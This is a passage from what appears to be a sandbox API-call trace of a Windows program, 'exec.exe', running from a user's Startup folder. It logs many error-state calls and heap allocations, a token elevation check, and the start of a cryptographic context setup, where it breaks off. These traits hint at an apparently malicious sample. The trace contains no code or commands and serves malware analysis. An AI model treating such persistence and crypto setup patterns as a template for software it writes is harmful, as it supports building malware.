a9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdd\x3a\xea\xcc\x44\xfc\x34", lpUsedDefaultChar=0x0) returned 256 [0101.483] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x98f728, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x64 [0101.483] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.484] SetLastError (dwErrCode=0x0) [0101.484] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.485] GetLastError () returned 0x0 [0101.485] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.486] SetLastError (dwErrCode=0x0) [0101.486] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.487] SetLastError (dwErrCode=0x0) [0101.487] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.488] GetLastError () returned 0x0 [0101.488] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.489] SetLastError (dwErrCode=0x0) [0101.489] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.490] SetLastError (dwErrCode=0x0) [0101.490] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.491] SetLastError (dwErrCode=0x0) [0101.491] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x6d) returned 0x1f719b0 [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.492] SetLastError (dwErrCode=0x0) [0101.492] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.493] SetLastError (dwErrCode=0x0) [0101.493] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.494] GetLastError () returned 0x0 [0101.494] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.495] SetLastError (dwErrCode=0x0) [0101.495] GetLastError () returned 0x0 [0101.496] SetLastError (dwErrCode=0x0) [0101.496] GetLastError () returned 0x0 [0101.496] SetLastError (dwErrCode=0x0) [0101.496] GetLastError () returned 0x0 [0101.496] SetLastError (dwErrCode=0x0) [0101.496] GetLastError () returned 0x0 [0101.496] SetLastError (dwErrCode=0x0) [0101.496] GetLastError () returned 0x0 [0101.496] SetLastError (dwErrCode=0x0) [0101.496] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.609] SetLastError (dwErrCode=0x0) [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x9c) returned 0x1f71a28 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1f) returned 0x1f71ad0 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x36) returned 0x1f71af8 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x37) returned 0x1f71b38 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x3c) returned 0x1f71b78 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x31) returned 0x1f71bc0 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f71c00 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x24) returned 0x1f71c20 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x14) returned 0x1f71c50 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xd) returned 0x1f71c70 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x25) returned 0x1f71c88 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x39) returned 0x1f71cb8 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f71d00 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f71d20 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xe) returned 0x1f71d40 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x69) returned 0x1f71d58 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x3e) returned 0x1f71dd0 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1b) returned 0x1f71e18 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1d) returned 0x1f71e40 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x48) returned 0x1f71e68 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x12) returned 0x1f71eb8 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f71ed8 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1b) returned 0x1f71ef8 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x24) returned 0x1f71f20 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x29) returned 0x1f71f50 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f71f88 [0101.609] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x41) returned 0x1f71fb0 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x17) returned 0x1f72000 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x14) returned 0x1f72020 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0xf) returned 0x1f72040 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x16) returned 0x1f72058 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x2a) returned 0x1f72078 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x29) returned 0x1f720b0 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x15) returned 0x1f720e8 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f72108 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x2a) returned 0x1f72130 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x12) returned 0x1f72168 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x18) returned 0x1f72188 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x46) returned 0x1f721a8 [0101.610] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f711f8 | out: hHeap=0x1f70000) returned 1 [0101.610] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0101.610] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x80) returned 0x1f711f8 [0101.610] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x988136) returned 0x0 [0101.611] RtlSizeHeap (HeapHandle=0x1f70000, Flags=0x0, MemoryPointer=0x1f711f8) returned 0x80 [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0103.241] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x30) returned 0x1f71280 [0103.241] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x3300) returned 0x1f721f8 [0103.241] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x15c) returned 0x1f712b8 [0103.241] GetTickCount () returned 0x5dc8 [0103.241] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x34fc78, cchData=32 | out: lpLCData="\x03") returned 16 [0103.243] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x1c) returned 0x1f71420 [0103.243] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x1c) returned 0x1f71448 [0103.243] GetVersion () returned 0x1db10106 [0103.243] GetCurrentProcess () returned 0xffffffff [0103.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x34fbdc | out: TokenHandle=0x34fbdc*=0x80) returned 1 [0103.243] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x34fbd4, TokenInformationLength=0x4, ReturnLength=0x34fbd8 | out: TokenInformation=0x34fbd4, ReturnLength=0x34fbd8) returned 1 [0103.243] CloseHandle (hObject=0x80) returned 1 [0103.243] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x20) returned 0x1f71470 [0103.243] CryptAcquireContextW (in: phProv=0x98fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 